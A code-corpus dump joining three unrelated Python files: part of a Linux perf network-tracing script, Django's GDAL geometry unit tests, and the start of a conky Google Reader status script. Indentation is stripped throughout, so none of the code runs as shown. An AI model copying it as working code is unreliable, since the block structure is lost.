print_transmit(tx_free_list[i])
if debug:
print "debug buffer status"
print "----------------------------"
print "xmit Qdisc:remain:%d overflow:%d" % \
(len(tx_queue_list), of_count_tx_queue_list)
print "xmit netdevice:remain:%d overflow:%d" % \
(len(tx_xmit_list), of_count_tx_xmit_list)
print "receive:remain:%d overflow:%d" % \
(len(rx_skb_list), of_count_rx_skb_list)
# called from perf, when it finds a correspoinding event
def irq__softirq_entry(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__softirq_exit(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__softirq_raise(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__irq_handler_entry(name, context, cpu, sec, nsec, pid, comm,
irq, irq_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
irq, irq_name)
all_event_list.append(event_info)
def irq__irq_handler_exit(name, context, cpu, sec, nsec, pid, comm, irq, ret):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, ret)
all_event_list.append(event_info)
def napi__napi_poll(name, context, cpu, sec, nsec, pid, comm, napi, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
napi, dev_name)
all_event_list.append(event_info)
def net__netif_receive_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr,
skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__netif_rx(name, context, cpu, sec, nsec, pid, comm, skbaddr,
skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__net_dev_queue(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__net_dev_xmit(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen, rc, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, rc ,dev_name)
all_event_list.append(event_info)
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
skbaddr, protocol, location):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, protocol, location)
all_event_list.append(event_info)
def skb__consume_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr)
all_event_list.append(event_info)
def skb__skb_copy_datagram_iovec(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen)
all_event_list.append(event_info)
def handle_irq_handler_entry(event_info):
(name, context, cpu, time, pid, comm, irq, irq_name) = event_info
if cpu not in irq_dic.keys():
irq_dic[cpu] = []
irq_record = {'irq':irq, 'name':irq_name, 'cpu':cpu, 'irq_ent_t':time}
irq_dic[cpu].append(irq_record)
def handle_irq_handler_exit(event_info):
(name, context, cpu, time, pid, comm, irq, ret) = event_info
if cpu not in irq_dic.keys():
return
irq_record = irq_dic[cpu].pop()
if irq != irq_record['irq']:
return
irq_record.update({'irq_ext_t':time})
# if an irq doesn't include NET_RX softirq, drop.
if 'event_list' in irq_record.keys():
irq_dic[cpu].append(irq_record)
def handle_irq_softirq_raise(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
if cpu not in irq_dic.keys() \
or len(irq_dic[cpu]) == 0:
return
irq_record = irq_dic[cpu].pop()
if 'event_list' in irq_record.keys():
irq_event_list = irq_record['event_list']
else:
irq_event_list = []
irq_event_list.append({'time':time, 'event':'sirq_raise'})
irq_record.update({'event_list':irq_event_list})
irq_dic[cpu].append(irq_record)
def handle_irq_softirq_entry(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
net_rx_dic[cpu] = {'sirq_ent_t':time, 'event_list':[]}
def handle_irq_softirq_exit(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
irq_list = []
event_list = 0
if cpu in irq_dic.keys():
irq_list = irq_dic[cpu]
del irq_dic[cpu]
if cpu in net_rx_dic.keys():
sirq_ent_t = net_rx_dic[cpu]['sirq_ent_t']
event_list = net_rx_dic[cpu]['event_list']
del net_rx_dic[cpu]
if irq_list == [] or event_list == 0:
return
rec_data = {'sirq_ent_t':sirq_ent_t, 'sirq_ext_t':time,
'irq_list':irq_list, 'event_list':event_list}
# merge information realted to a NET_RX softirq
receive_hunk_list.append(rec_data)
def handle_napi_poll(event_info):
(name, context, cpu, time, pid, comm, napi, dev_name) = event_info
if cpu in net_rx_dic.keys():
event_list = net_rx_dic[cpu]['event_list']
rec_data = {'event_name':'napi_poll',
'dev':dev_name, 'event_t':time}
event_list.append(rec_data)
def handle_netif_rx(event_info):
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
if cpu not in irq_dic.keys() \
or len(irq_dic[cpu]) == 0:
return
irq_record = irq_dic[cpu].pop()
if 'event_list' in irq_record.keys():
irq_event_list = irq_record['event_list']
else:
irq_event_list = []
irq_event_list.append({'time':time, 'event':'netif_rx',
'skbaddr':skbaddr, 'skblen':skblen, 'dev_name':dev_name})
irq_record.update({'event_list':irq_event_list})
irq_dic[cpu].append(irq_record)
def handle_netif_receive_skb(event_info):
global of_count_rx_skb_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
if cpu in net_rx_dic.keys():
rec_data = {'event_name':'netif_receive_skb',
'event_t':time, 'skbaddr':skbaddr, 'len':skblen}
event_list = net_rx_dic[cpu]['event_list']
event_list.append(rec_data)
rx_skb_list.insert(0, rec_data)
if len(rx_skb_list) > buffer_budget:
rx_skb_list.pop()
of_count_rx_skb_list += 1
def handle_net_dev_queue(event_info):
global of_count_tx_queue_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
skb = {'dev':dev_name, 'skbaddr':skbaddr, 'len':skblen, 'queue_t':time}
tx_queue_list.insert(0, skb)
if len(tx_queue_list) > buffer_budget:
tx_queue_list.pop()
of_count_tx_queue_list += 1
def handle_net_dev_xmit(event_info):
global of_count_tx_xmit_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, rc, dev_name) = event_info
if rc == 0: # NETDEV_TX_OK
for i in range(len(tx_queue_list)):
skb = tx_queue_list[i]
if skb['skbaddr'] == skbaddr:
skb['xmit_t'] = time
tx_xmit_list.insert(0, skb)
del tx_queue_list[i]
if len(tx_xmit_list) > buffer_budget:
tx_xmit_list.pop()
of_count_tx_xmit_list += 1
return
def handle_kfree_skb(event_info):
(name, context, cpu, time, pid, comm,
skbaddr, protocol, location) = event_info
for i in range(len(tx_queue_list)):
skb = tx_queue_list[i]
if skb['skbaddr'] == skbaddr:
del tx_queue_list[i]
return
for i in range(len(tx_xmit_list)):
skb = tx_xmit_list[i]
if skb['skbaddr'] == skbaddr:
skb['free_t'] = time
tx_free_list.append(skb)
del tx_xmit_list[i]
return
for i in range(len(rx_skb_list)):
rec_data = rx_skb_list[i]
if rec_data['skbaddr'] == skbaddr:
rec_data.update({'handle':"kfree_skb",
'comm':comm, 'pid':pid, 'comm_t':time})
del rx_skb_list[i]
return
def handle_consume_skb(event_info):
(name, context, cpu, time, pid, comm, skbaddr) = event_info
for i in range(len(tx_xmit_list)):
skb = tx_xmit_list[i]
if skb['skbaddr'] == skbaddr:
skb['free_t'] = time
tx_free_list.append(skb)
del tx_xmit_list[i]
return
def handle_skb_copy_datagram_iovec(event_info):
(name, context, cpu, time, pid, comm, skbaddr, skblen) = event_info
for i in range(len(rx_skb_list)):
rec_data = rx_skb_list[i]
if skbaddr == rec_data['skbaddr']:
rec_data.update({'handle':"skb_copy_datagram_iovec",
'comm':comm, 'pid':pid, 'comm_t':time})
del rx_skb_list[i]
return
|
gpl-2.0
|
yamila-moreno/django
|
tests/gis_tests/gdal_tests/test_geom.py
|
256
|
20748
|
import json
import unittest
from binascii import b2a_hex
from unittest import skipUnless
from django.contrib.gis.gdal import HAS_GDAL
from django.utils.six.moves import range
from ..test_data import TestDataMixin
try:
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
if HAS_GDAL:
from django.contrib.gis.gdal import (OGRGeometry, OGRGeomType,
GDALException, OGRIndexError, SpatialReference, CoordTransform,
GDAL_VERSION)
@skipUnless(HAS_GDAL, "GDAL is required")
class OGRGeomTest(unittest.TestCase, TestDataMixin):
"This tests the OGR Geometry."
def test_geomtype(self):
"Testing OGRGeomType object."
# OGRGeomType should initialize on all these inputs.
OGRGeomType(1)
OGRGeomType(7)
OGRGeomType('point')
OGRGeomType('GeometrycollectioN')
OGRGeomType('LINearrING')
OGRGeomType('Unknown')
# Should throw TypeError on this input
self.assertRaises(GDALException, OGRGeomType, 23)
self.assertRaises(GDALException, OGRGeomType, 'fooD')
self.assertRaises(GDALException, OGRGeomType, 9)
# Equivalence can take strings, ints, and other OGRGeomTypes
self.assertEqual(OGRGeomType(1), OGRGeomType(1))
self.assertEqual(OGRGeomType(7), 'GeometryCollection')
self.assertEqual(OGRGeomType('point'), 'POINT')
self.assertNotEqual(OGRGeomType('point'), 2)
self.assertEqual(OGRGeomType('unknown'), 0)
self.assertEqual(OGRGeomType(6), 'MULtiPolyGON')
self.assertEqual(OGRGeomType(1), OGRGeomType('point'))
self.assertNotEqual(OGRGeomType('POINT'), OGRGeomType(6))
# Testing the Django field name equivalent property.
self.assertEqual('PointField', OGRGeomType('Point').django)
self.assertEqual('GeometryField', OGRGeomType('Geometry').django)
self.assertEqual('GeometryField', OGRGeomType('Unknown').django)
self.assertIsNone(OGRGeomType('none').django)
# 'Geometry' initialization implies an unknown geometry type.
gt = OGRGeomType('Geometry')
self.assertEqual(0, gt.num)
self.assertEqual('Unknown', gt.name)
def test_geomtype_25d(self):
"Testing OGRGeomType object with 25D types."
wkb25bit = OGRGeomType.wkb25bit
self.assertEqual(OGRGeomType(wkb25bit + 1), 'Point25D')
self.assertEqual(OGRGeomType('MultiLineString25D'), (5 + wkb25bit))
self.assertEqual('GeometryCollectionField', OGRGeomType('GeometryCollection25D').django)
def test_wkt(self):
"Testing WKT output."
for g in self.geometries.wkt_out:
geom = OGRGeometry(g.wkt)
self.assertEqual(g.wkt, geom.wkt)
def test_ewkt(self):
"Testing EWKT input/output."
for ewkt_val in ('POINT (1 2 3)', 'LINEARRING (0 0,1 1,2 1,0 0)'):
# First with ewkt output when no SRID in EWKT
self.assertEqual(ewkt_val, OGRGeometry(ewkt_val).ewkt)
# No test consumption with an SRID specified.
ewkt_val = 'SRID=4326;%s' % ewkt_val
geom = OGRGeometry(ewkt_val)
self.assertEqual(ewkt_val, geom.ewkt)
self.assertEqual(4326, geom.srs.srid)
def test_gml(self):
"Testing GML output."
for g in self.geometries.wkt_out:
geom = OGRGeometry(g.wkt)
exp_gml = g.gml
if GDAL_VERSION >= (1, 8):
# In GDAL 1.8, the non-conformant GML tag <gml:GeometryCollection> was
# replaced with <gml:MultiGeometry>.
exp_gml = exp_gml.replace('GeometryCollection', 'MultiGeometry')
self.assertEqual(exp_gml, geom.gml)
def test_hex(self):
"Testing HEX input/output."
for g in self.geometries.hex_wkt:
geom1 = OGRGeometry(g.wkt)
self.assertEqual(g.hex.encode(), geom1.hex)
# Constructing w/HEX
geom2 = OGRGeometry(g.hex)
self.assertEqual(geom1, geom2)
def test_wkb(self):
"Testing WKB input/output."
for g in self.geometries.hex_wkt:
geom1 = OGRGeometry(g.wkt)
wkb = geom1.wkb
self.assertEqual(b2a_hex(wkb).upper(), g.hex.encode())
# Constructing w/WKB.
geom2 = OGRGeometry(wkb)
self.assertEqual(geom1, geom2)
def test_json(self):
"Testing GeoJSON input/output."
for g in self.geometries.json_geoms:
geom = OGRGeometry(g.wkt)
if not hasattr(g, 'not_equal'):
# Loading jsons to prevent decimal differences
self.assertEqual(json.loads(g.json), json.loads(geom.json))
self.assertEqual(json.loads(g.json), json.loads(geom.geojson))
self.assertEqual(OGRGeometry(g.wkt), OGRGeometry(geom.json))
# Test input with some garbage content (but valid json) (#15529)
geom = OGRGeometry('{"type": "Point", "coordinates": [ 100.0, 0.0 ], "other": "<test>"}')
self.assertIsInstance(geom, OGRGeometry)
def test_points(self):
"Testing Point objects."
OGRGeometry('POINT(0 0)')
for p in self.geometries.points:
if not hasattr(p, 'z'): # No 3D
pnt = OGRGeometry(p.wkt)
self.assertEqual(1, pnt.geom_type)
self.assertEqual('POINT', pnt.geom_name)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual((p.x, p.y), pnt.tuple)
def test_multipoints(self):
"Testing MultiPoint objects."
for mp in self.geometries.multipoints:
mgeom1 = OGRGeometry(mp.wkt) # First one from WKT
self.assertEqual(4, mgeom1.geom_type)
self.assertEqual('MULTIPOINT', mgeom1.geom_name)
mgeom2 = OGRGeometry('MULTIPOINT') # Creating empty multipoint
mgeom3 = OGRGeometry('MULTIPOINT')
for g in mgeom1:
mgeom2.add(g) # adding each point from the multipoints
mgeom3.add(g.wkt) # should take WKT as well
self.assertEqual(mgeom1, mgeom2) # they should equal
self.assertEqual(mgeom1, mgeom3)
self.assertEqual(mp.coords, mgeom2.coords)
self.assertEqual(mp.n_p, mgeom2.point_count)
def test_linestring(self):
"Testing LineString objects."
prev = OGRGeometry('POINT(0 0)')
for ls in self.geometries.linestrings:
linestr = OGRGeometry(ls.wkt)
self.assertEqual(2, linestr.geom_type)
self.assertEqual('LINESTRING', linestr.geom_name)
self.assertEqual(ls.n_p, linestr.point_count)
self.assertEqual(ls.coords, linestr.tuple)
self.assertEqual(linestr, OGRGeometry(ls.wkt))
self.assertNotEqual(linestr, prev)
self.assertRaises(OGRIndexError, linestr.__getitem__, len(linestr))
prev = linestr
# Testing the x, y properties.
x = [tmpx for tmpx, tmpy in ls.coords]
y = [tmpy for tmpx, tmpy in ls.coords]
self.assertEqual(x, linestr.x)
self.assertEqual(y, linestr.y)
def test_multilinestring(self):
"Testing MultiLineString objects."
prev = OGRGeometry('POINT(0 0)')
for mls in self.geometries.multilinestrings:
mlinestr = OGRGeometry(mls.wkt)
self.assertEqual(5, mlinestr.geom_type)
self.assertEqual('MULTILINESTRING', mlinestr.geom_name)
self.assertEqual(mls.n_p, mlinestr.point_count)
self.assertEqual(mls.coords, mlinestr.tuple)
self.assertEqual(mlinestr, OGRGeometry(mls.wkt))
self.assertNotEqual(mlinestr, prev)
prev = mlinestr
for ls in mlinestr:
self.assertEqual(2, ls.geom_type)
self.assertEqual('LINESTRING', ls.geom_name)
self.assertRaises(OGRIndexError, mlinestr.__getitem__, len(mlinestr))
def test_linearring(self):
"Testing LinearRing objects."
prev = OGRGeometry('POINT(0 0)')
for rr in self.geometries.linearrings:
lr = OGRGeometry(rr.wkt)
# self.assertEqual(101, lr.geom_type.num)
self.assertEqual('LINEARRING', lr.geom_name)
self.assertEqual(rr.n_p, len(lr))
self.assertEqual(lr, OGRGeometry(rr.wkt))
self.assertNotEqual(lr, prev)
prev = lr
def test_polygons(self):
"Testing Polygon objects."
# Testing `from_bbox` class method
bbox = (-180, -90, 180, 90)
p = OGRGeometry.from_bbox(bbox)
self.assertEqual(bbox, p.extent)
prev = OGRGeometry('POINT(0 0)')
for p in self.geometries.polygons:
poly = OGRGeometry(p.wkt)
self.assertEqual(3, poly.geom_type)
self.assertEqual('POLYGON', poly.geom_name)
self.assertEqual(p.n_p, poly.point_count)
self.assertEqual(p.n_i + 1, len(poly))
# Testing area & centroid.
self.assertAlmostEqual(p.area, poly.area, 9)
x, y = poly.centroid.tuple
self.assertAlmostEqual(p.centroid[0], x, 9)
self.assertAlmostEqual(p.centroid[1], y, 9)
# Testing equivalence
self.assertEqual(poly, OGRGeometry(p.wkt))
self.assertNotEqual(poly, prev)
if p.ext_ring_cs:
ring = poly[0]
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple)
self.assertEqual(len(p.ext_ring_cs), ring.point_count)
for r in poly:
self.assertEqual('LINEARRING', r.geom_name)
def test_closepolygons(self):
"Testing closing Polygon objects."
# Both rings in this geometry are not closed.
poly = OGRGeometry('POLYGON((0 0, 5 0, 5 5, 0 5), (1 1, 2 1, 2 2, 2 1))')
self.assertEqual(8, poly.point_count)
with self.assertRaises(GDALException):
poly.centroid
poly.close_rings()
self.assertEqual(10, poly.point_count) # Two closing points should've been added
self.assertEqual(OGRGeometry('POINT(2.5 2.5)'), poly.centroid)
def test_multipolygons(self):
"Testing MultiPolygon objects."
OGRGeometry('POINT(0 0)')
for mp in self.geometries.multipolygons:
mpoly = OGRGeometry(mp.wkt)
self.assertEqual(6, mpoly.geom_type)
self.assertEqual('MULTIPOLYGON', mpoly.geom_name)
if mp.valid:
self.assertEqual(mp.n_p, mpoly.point_count)
self.assertEqual(mp.num_geom, len(mpoly))
self.assertRaises(OGRIndexError, mpoly.__getitem__, len(mpoly))
for p in mpoly:
self.assertEqual('POLYGON', p.geom_name)
self.assertEqual(3, p.geom_type)
self.assertEqual(mpoly.wkt, OGRGeometry(mp.wkt).wkt)
def test_srs(self):
"Testing OGR Geometries with Spatial Reference objects."
for mp in self.geometries.multipolygons:
# Creating a geometry w/spatial reference
sr = SpatialReference('WGS84')
mpoly = OGRGeometry(mp.wkt, sr)
self.assertEqual(sr.wkt, mpoly.srs.wkt)
# Ensuring that SRS is propagated to clones.
klone = mpoly.clone()
self.assertEqual(sr.wkt, klone.srs.wkt)
# Ensuring all children geometries (polygons and their rings) all
# return the assigned spatial reference as well.
for poly in mpoly:
self.assertEqual(sr.wkt, poly.srs.wkt)
for ring in poly:
self.assertEqual(sr.wkt, ring.srs.wkt)
# Ensuring SRS propagate in topological ops.
a = OGRGeometry(self.geometries.topology_geoms[0].wkt_a, sr)
b = OGRGeometry(self.geometries.topology_geoms[0].wkt_b, sr)
diff = a.difference(b)
union = a.union(b)
self.assertEqual(sr.wkt, diff.srs.wkt)
self.assertEqual(sr.srid, union.srs.srid)
# Instantiating w/an integer SRID
mpoly = OGRGeometry(mp.wkt, 4326)
self.assertEqual(4326, mpoly.srid)
mpoly.srs = SpatialReference(4269)
self.assertEqual(4269, mpoly.srid)
self.assertEqual('NAD83', mpoly.srs.name)
# Incrementing through the multipolygon after the spatial reference
# has been re-assigned.
for poly in mpoly:
self.assertEqual(mpoly.srs.wkt, poly.srs.wkt)
poly.srs = 32140
for ring in poly:
# Changing each ring in the polygon
self.assertEqual(32140, ring.srs.srid)
self.assertEqual('NAD83 / Texas South Central', ring.srs.name)
ring.srs = str(SpatialReference(4326)) # back to WGS84
self.assertEqual(4326, ring.srs.srid)
# Using the `srid` property.
ring.srid = 4322
self.assertEqual('WGS 72', ring.srs.name)
self.assertEqual(4322, ring.srid)
def test_srs_transform(self):
"Testing transform()."
orig = OGRGeometry('POINT (-104.609 38.255)', 4326)
trans = OGRGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using an srid, a SpatialReference object, and a CoordTransform object
# or transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(SpatialReference('EPSG:2774'))
ct = CoordTransform(SpatialReference('WGS84'), SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
prec = 3
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
def test_transform_dim(self):
"Testing coordinate dimension is the same on transformed geometries."
ls_orig = OGRGeometry('LINESTRING(-104.609 38.255)', 4326)
ls_trans = OGRGeometry('LINESTRING(992385.4472045 481455.4944650)', 2774)
prec = 3
ls_orig.transform(ls_trans.srs)
# Making sure the coordinate dimension is still 2D.
self.assertEqual(2, ls_orig.coord_dim)
self.assertAlmostEqual(ls_trans.x[0], ls_orig.x[0], prec)
self.assertAlmostEqual(ls_trans.y[0], ls_orig.y[0], prec)
def test_difference(self):
"Testing difference()."
for i in range(len(self.geometries.topology_geoms)):
a = OGRGeometry(self.geometries.topology_geoms[i].wkt_a)
b = OGRGeometry(self.geometries.topology_geoms[i].wkt_b)
d1 = OGRGeometry(self.geometries.diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a - b) # __sub__ is difference operator
a -= b # testing __isub__
self.assertEqual(d1, a)
def test_intersection(self):
"Testing intersects() and intersection()."
for i in range(len(self.geometries.topology_geoms)):
a = OGRGeometry(self.geometries.topology_geoms[i].wkt_a)
b = OGRGeometry(self.geometries.topology_geoms[i].wkt_b)
i1 = OGRGeometry(self.geometries.intersect_geoms[i].wkt)
self.assertTrue(a.intersects(b))
i2 = a.intersection(b)
self.assertEqual(i1, i2)
self.assertEqual(i1, a & b) # __and__ is intersection operator
a &= b # testing __iand__
self.assertEqual(i1, a)
def test_symdifference(self):
"Testing sym_difference()."
for i in range(len(self.geometries.topology_geoms)):
a = OGRGeometry(self.geometries.topology_geoms[i].wkt_a)
b = OGRGeometry(self.geometries.topology_geoms[i].wkt_b)
d1 = OGRGeometry(self.geometries.sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a ^ b) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertEqual(d1, a)
def test_union(self):
"Testing union()."
for i in range(len(self.geometries.topology_geoms)):
a = OGRGeometry(self.geometries.topology_geoms[i].wkt_a)
b = OGRGeometry(self.geometries.topology_geoms[i].wkt_b)
u1 = OGRGeometry(self.geometries.union_geoms[i].wkt)
u2 = a.union(b)
self.assertEqual(u1, u2)
self.assertEqual(u1, a | b) # __or__ is union operator
a |= b # testing __ior__
self.assertEqual(u1, a)
def test_add(self):
"Testing GeometryCollection.add()."
# Can't insert a Point into a MultiPolygon.
mp = OGRGeometry('MultiPolygon')
pnt = OGRGeometry('POINT(5 23)')
self.assertRaises(GDALException, mp.add, pnt)
# GeometryCollection.add may take an OGRGeometry (if another collection
# of the same type all child geoms will be added individually) or WKT.
for mp in self.geometries.multipolygons:
mpoly = OGRGeometry(mp.wkt)
mp1 = OGRGeometry('MultiPolygon')
mp2 = OGRGeometry('MultiPolygon')
mp3 = OGRGeometry('MultiPolygon')
for poly in mpoly:
mp1.add(poly) # Adding a geometry at a time
mp2.add(poly.wkt) # Adding WKT
mp3.add(mpoly) # Adding a MultiPolygon's entire contents at once.
for tmp in (mp1, mp2, mp3):
self.assertEqual(mpoly, tmp)
def test_extent(self):
"Testing `extent` property."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = OGRGeometry('MULTIPOINT(5 23, 0 0, 10 50)')
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
# Testing on the 'real world' Polygon.
poly = OGRGeometry(self.geometries.polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test_25D(self):
"Testing 2.5D geometries."
pnt_25d = OGRGeometry('POINT(1 2 3)')
self.assertEqual('Point25D', pnt_25d.geom_type.name)
self.assertEqual(3.0, pnt_25d.z)
self.assertEqual(3, pnt_25d.coord_dim)
ls_25d = OGRGeometry('LINESTRING(1 1 1,2 2 2,3 3 3)')
self.assertEqual('LineString25D', ls_25d.geom_type.name)
self.assertEqual([1.0, 2.0, 3.0], ls_25d.z)
self.assertEqual(3, ls_25d.coord_dim)
def test_pickle(self):
"Testing pickle support."
g1 = OGRGeometry('LINESTRING(1 1 1,2 2 2,3 3 3)', 'WGS84')
g2 = pickle.loads(pickle.dumps(g1))
self.assertEqual(g1, g2)
self.assertEqual(4326, g2.srs.srid)
self.assertEqual(g1.srs.wkt, g2.srs.wkt)
def test_ogrgeometry_transform_workaround(self):
"Testing coordinate dimensions on geometries after transformation."
# A bug in GDAL versions prior to 1.7 changes the coordinate
# dimension of a geometry after it has been transformed.
# This test ensures that the bug workarounds employed within
# `OGRGeometry.transform` indeed work.
wkt_2d = "MULTILINESTRING ((0 0,1 1,2 2))"
wkt_3d = "MULTILINESTRING ((0 0 0,1 1 1,2 2 2))"
srid = 4326
# For both the 2D and 3D MultiLineString, ensure _both_ the dimension
# of the collection and the component LineString have the expected
# coordinate dimension after transform.
geom = OGRGeometry(wkt_2d, srid)
geom.transform(srid)
self.assertEqual(2, geom.coord_dim)
self.assertEqual(2, geom[0].coord_dim)
self.assertEqual(wkt_2d, geom.wkt)
geom = OGRGeometry(wkt_3d, srid)
geom.transform(srid)
self.assertEqual(3, geom.coord_dim)
self.assertEqual(3, geom[0].coord_dim)
self.assertEqual(wkt_3d, geom.wkt)
def test_equivalence_regression(self):
"Testing equivalence methods with non-OGRGeometry instances."
self.assertIsNotNone(OGRGeometry('POINT(0 0)'))
self.assertNotEqual(OGRGeometry('LINESTRING(0 0, 1 1)'), 3)
|
bsd-3-clause
|
vanloswang/conky_all
|
conky_colors/conkycolors/scripts/conkyGoogleReader.py
|
7
|
12797
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
###############################################################################
# conkyEmail.py is a simple python script to gather
# details of google reader subscriptions for use in conky.
#
# Author: Kaivalagi
# Created: 09/07/2008
#
# 18/05/2009 Updated to expand ~ based template paths
# 14/12/2009 Updated to work with new authentication requirements, old method stopped working for some reason
from datetime import datetime
from optparse import OptionParser
from xml.dom import minidom
from keyring import get_password
import codecs
import socket
import sys
import traceback
import urllib
import urllib2
import os
class CommandLineParser:
parser = None
def __init__(self):
self.parser = OptionParser()
self.parser.add_option("-u","--username",dest="username", type="string", metavar="USERNAME", help=u"username to login with")
self.parser.add_option("-p","--password",dest="password", type="string", metavar="PASSWORD", help=u"Password to login with, if not set the username is used to fetch a 'conky' password from the keyring")
self.parser.add_option("-t","--template",dest="template", type="string", metavar="FILE", help=u"Template file determining the format for each rss feed summary. Use the following placeholders: [unreadcount], [name], [url]")
self.parser.add_option("-s","--summarytemplate",dest="summarytemplate", type="string", metavar="FILE", help=u"Template file determining the format for summary output. Use the following placeholders: [totalfeedscount], [unreadfeedscount], [unreadfeeditemscount]")
self.parser.add_option("-S","--summaryoutput",dest="summaryoutput", default=False, action="store_true", help=u"Request summary output rather than each feeds details")
self.parser.add_option("-c","--connectiontimeout",dest="connectiontimeout", type="int", default=10, metavar="NUMBER", help=u"[default: %default] Define the number of seconds before a connection timeout can occur.")
self.parser.add_option("-v","--verbose",dest="verbose", default=False, action="store_true", help=u"Request verbose output, no a good idea when running through conky!")
self.parser.add_option("-V", "--version", dest="version", default=False, action="store_true", help=u"Displays the version of the script.")
self.parser.add_option("--errorlogfile", dest="errorlogfile", type="string", metavar="FILE", help=u"If a filepath is set, the script appends errors to the filepath.")
self.parser.add_option("--infologfile", dest="infologfile", type="string", metavar="FILE", help=u"If a filepath is set, the script appends info to the filepath.")
def parse_args(self):
(options, args) = self.parser.parse_args()
return (options, args)
def print_help(self):
return self.parser.print_help()
class FeedData:
def __init__(self, name, url, unreadcount):
self.name = name
self.url = url
self.unreadcount = unreadcount
def __cmp__(self, other):
return cmp(int(other.unreadcount),int(self.unreadcount))
def __str__(self):
return str(self.name + " - " + self.unreadcount)
class GoogleReader:
def __init__(self,options):
try:
self.options = options
# obtain a password from the keyring if none is set
if self.options.password == None:
self.logInfo("Attempting to obtain a password through the conky keyring as none was provided")
try:
password = get_password("conky", self.options.username)
except Exception, e:
self.logError("Failed to retrieve password from keyring:" + traceback.format_exc())
if password == None:
self.logError("No password was found in the conky keyring")
else:
self.options.password = password
self.logInfo("Initialising google reader...")
socket.setdefaulttimeout(self.options.connectiontimeout)
except Exception,e:
self.logError("GoogleReader Initialisation:Unexpected error:" + e.__str__()+traceback.format_exc())
def writeOutput(self):
auth_header = self.getAuthorizationHeader()
if auth_header != None:
self.logInfo("Processing output...")
if self.options.template == None:
# create default template
template = "[unreadcount] [name] - [url]\n"
else:
# load the template file contents
try:
#fileinput = open(self.options.template)
fileinput = codecs.open(os.path.expanduser(self.options.template), encoding='utf-8')
template = fileinput.read()
fileinput.close()
# lose the final "\n" which should always be there...
template = template[0:len(template)-1]
except:
self.logError("Template file no found!")
sys.exit(2)
if self.options.summarytemplate == None:
# create default template
summarytemplate = "[unreadfeeditemscount] unread feed items, [unreadfeedscount]/[totalfeedscount] feeds have unread content.\n"
else:
# load the template file contents
try:
#fileinput = open(self.options.template)
fileinput = codecs.open(os.path.expanduser(self.options.summarytemplate), encoding='utf-8')
summarytemplate = fileinput.read()
fileinput.close()
# lose the final "\n" which should always be there...
summarytemplate = summarytemplate[0:len(summarytemplate)-1]
except:
self.logError("Template file no found!")
sys.exit(2)
totalfeedscount, unreadfeedscount, unreadfeeditemscount, feeds = self.getUnreadItems(auth_header)
output = ""
if self.options.summaryoutput == True:
output = self.getOutputFromSummaryTemplate(summarytemplate, totalfeedscount, unreadfeedscount, unreadfeeditemscount)
else:
for feeddata in feeds:
output = output + self.getOutputFromTemplate(template, feeddata.unreadcount, feeddata.name, feeddata.url)
print output.encode("utf-8")
def getOutputFromTemplate(self, template, unreadcount, name, url):
try:
output = template
output = output.replace("[unreadcount]",unreadcount)
